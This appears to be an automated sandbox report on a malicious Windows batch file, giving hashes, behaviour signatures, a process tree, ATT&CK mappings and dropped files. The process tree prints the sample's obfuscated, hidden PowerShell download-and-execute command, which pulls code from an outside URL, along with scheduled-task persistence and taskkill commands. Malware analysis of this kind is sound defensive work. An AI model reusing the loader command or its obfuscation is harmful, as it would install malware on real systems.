Analysis

  • max time kernel
    151s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    11-10-2022 21:41

General

  • Target

    OutPut2.bat

  • Size

    21KB

  • MD5

    c32b1f1bb8eda7a1e148c1cdf014f23b

  • SHA1

    af0cc28285fc57632751f970ba3040bb1af2faa0

  • SHA256

    8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6

  • SHA512

    f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e

  • SSDEEP

    96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\system32\cmd.exe
      CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:320
          • C:\Windows\System32\cmd.exe
            cmd /c ""C:\ProgramData\App\xx.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1980
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:1628
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:1220
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM schtasks.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:456
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM powershell.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1684
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM cmd.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2024
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {4960EA12-69D3-4B98-B5D4-F5B8F661988D} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\ProgramData\App\cAppc.bat" "
        3⤵
          PID:940
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS1
            4⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1604
      • C:\Windows\System32\WScript.exe
        C:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\System32\cmd.exe
          cmd /c ""C:\ProgramData\App\cAppc.bat" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS1
            4⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1676

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\App\App.PS1
      Filesize

      264KB

      MD5

      b385ec653fef60833ca284dcfff71bff

      SHA1

      612981ecf896a7ef09496894d8059f6a9570cf2a

      SHA256

      76a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8

      SHA512

      00f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81

    • C:\ProgramData\App\cAppc.bat
      Filesize

      81B

      MD5

      6d2d36c3cc7bea993801e5febf7db1c8

      SHA1

      962ca57c247334f79d40e55aa30612c5dfe96c12

      SHA256

      83c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68

      SHA512

      751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d

    • C:\ProgramData\App\cAppc.vbs
      Filesize

      5KB

      MD5

      5392a92ca835d8812a79a1ee6dac0892

      SHA1

      cb56f654f054542c538f492c4d437d65e4f9bba7

      SHA256

      4ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5

      SHA512

      02175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d

    • C:\ProgramData\App\xx.bat
      Filesize

      260B

      MD5

      15b09a88be68cc160232d8766f7e3be7

      SHA1

      b3468aaafd099c639405574b719a201b8df00b02

      SHA256

      d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2

      SHA512

      0cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460

    • C:\ProgramData\App\xx.vbs
      Filesize

      4KB

      MD5

      1de9b452f5231a8281209d61a101bcb5

      SHA1

      27ea6c5470a58226b7a1ab8986d3d0bec87ae3eb

      SHA256

      0920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64

      SHA512

      e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      adca19c2d935622e6a96998c8103fc4b

      SHA1

      e50d9fb1bd709ce58d87278bd3887e2cadbb73c6

      SHA256

      f18bcce62919fb49d9720b6ceede99449757e0adef5e9d3f18e58631cf23c166

      SHA512

      3567d9a82a068252c2cd92d965fb092b638c72abdeaa80021a72e173eca4789417113780f4fcf0b44f9f676b243e0d6042db0acb576c387bcdaf32386a021c0d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      922e2142ca596c3b35efebf1082ac830

      SHA1

      2a9fe1438e01736d37d5036b85c4a99224e32c71

      SHA256

      8ec919e95012c559abc44bf12490292e0cddeacaca25488f451eb6e76368c469

      SHA512

      972313ea3ab6b2f4252b5f9220cd6d6c473d49e75e45120b2a72fe8668d5152ef4638e786f307f945630727d129a036e5fe267aa9b0f3c5d0f5071c9bb7c4fd0

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/320-64-0x0000000000000000-mapping.dmp
    • memory/456-72-0x0000000000000000-mapping.dmp
    • memory/940-80-0x0000000000000000-mapping.dmp
    • memory/1220-71-0x0000000000000000-mapping.dmp
    • memory/1444-91-0x0000000000000000-mapping.dmp
    • memory/1448-61-0x000000000287B000-0x000000000289A000-memory.dmp
      Filesize

      124KB

    • memory/1448-59-0x0000000002874000-0x0000000002877000-memory.dmp
      Filesize

      12KB

    • memory/1448-93-0x0000000000000000-mapping.dmp
    • memory/1448-62-0x0000000002874000-0x0000000002877000-memory.dmp
      Filesize

      12KB

    • memory/1448-60-0x000000001B7D0000-0x000000001BACF000-memory.dmp
      Filesize

      3.0MB

    • memory/1448-57-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp
      Filesize

      10.1MB

    • memory/1448-55-0x0000000000000000-mapping.dmp
    • memory/1448-66-0x000000000287B000-0x000000000289A000-memory.dmp
      Filesize

      124KB

    • memory/1448-56-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
      Filesize

      8KB

    • memory/1448-58-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp
      Filesize

      11.4MB

    • memory/1448-63-0x000000000287B000-0x000000000289A000-memory.dmp
      Filesize

      124KB

    • memory/1604-85-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmp
      Filesize

      11.4MB

    • memory/1604-89-0x0000000002614000-0x0000000002617000-memory.dmp
      Filesize

      12KB

    • memory/1604-84-0x000007FEF3F50000-0x000007FEF4973000-memory.dmp
      Filesize

      10.1MB

    • memory/1604-86-0x0000000002614000-0x0000000002617000-memory.dmp
      Filesize

      12KB

    • memory/1604-87-0x000000001B810000-0x000000001BB0F000-memory.dmp
      Filesize

      3.0MB

    • memory/1604-90-0x000000000261B000-0x000000000263A000-memory.dmp
      Filesize

      124KB

    • memory/1628-70-0x0000000000000000-mapping.dmp
    • memory/1676-97-0x000007FEF35B0000-0x000007FEF3FD3000-memory.dmp
      Filesize

      10.1MB

    • memory/1676-94-0x0000000000000000-mapping.dmp
    • memory/1676-98-0x000007FEF2A50000-0x000007FEF35AD000-memory.dmp
      Filesize

      11.4MB

    • memory/1676-99-0x00000000024B4000-0x00000000024B7000-memory.dmp
      Filesize

      12KB

    • memory/1676-100-0x00000000024BB000-0x00000000024DA000-memory.dmp
      Filesize

      124KB

    • memory/1676-101-0x00000000024B4000-0x00000000024B7000-memory.dmp
      Filesize

      12KB

    • memory/1676-102-0x00000000024BB000-0x00000000024DA000-memory.dmp
      Filesize

      124KB

    • memory/1684-73-0x0000000000000000-mapping.dmp
    • memory/1744-54-0x0000000000000000-mapping.dmp
    • memory/1920-76-0x0000000000000000-mapping.dmp
    • memory/1980-69-0x0000000000000000-mapping.dmp
    • memory/2024-74-0x0000000000000000-mapping.dmp